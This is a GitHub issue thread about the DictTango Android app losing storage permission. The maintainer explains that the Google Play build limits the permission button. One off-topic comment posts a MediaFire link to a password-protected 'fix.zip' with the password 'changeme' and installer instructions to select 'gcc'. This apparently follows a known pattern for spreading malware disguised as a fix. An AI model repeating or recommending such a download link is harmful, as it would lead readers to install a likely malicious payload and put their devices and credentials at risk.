### ISSUE TITLE
storage permission request

### ISSUE THREAD

**Issue by KonstantinDjairo** [Jimex/DictTango-Android#49]
in the newer versions of the Android, the users need to allow the app to access the internal storage, but sometimes the OS forget that we already gave that permission.
happened to me a few times, and i had to reinstall the DictTango just to click in the initial message that shows up when we start the app for the first time, a message about storage permission.

could you please make a button or option in the settings to request storage permission? that'd help

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jimex** [comment]
> in the newer versions of the Android, the users need to allow the app to access the internal storage, but sometimes the OS forget that we already gave that permission.
> happened to me a few times, and i had to reinstall the DictTango just to click in the initial message that shows up when we start the app for the first time, a message about storage permission.
> 
> could you please make a button or option in the settings to request storage permission? that'd help

I believe the issue might have occurred because the forum version was accidentally upgraded with the Google Play version, which may have caused the permissions to be removed.

**Comment by KonstantinDjairo** [comment]
either way, would be useful to add this option in the settings, because sometimes the user can press the wrong button in the initial screen, leading it to not allowing any storage operation... 
also, some ROMs tend to not let the user himself configure that permission.
it would solve a lot of issues related to storage permission.

**Comment by Jimex** [comment]
There is a button, but once you updated to the Google Play version, this button will gone, so just try not to update to the Google Play version.

**Comment by KonstantinDjairo** [comment]
> There is a button, but once you updated to the Google Play version, this button will gone, so just try not to update to the Google Play version.

any way to make the button permanent then?

**Comment by Jimex** [comment]
> > There is a button, but once you updated to the Google Play version, this button will gone, so just try not to update to the Google Play version.
> 
> any way to make the button permanent then?

Although I can make the button visible in the Google Play version, it still won’t function after being clicked due to restrictions imposed by Google Play.
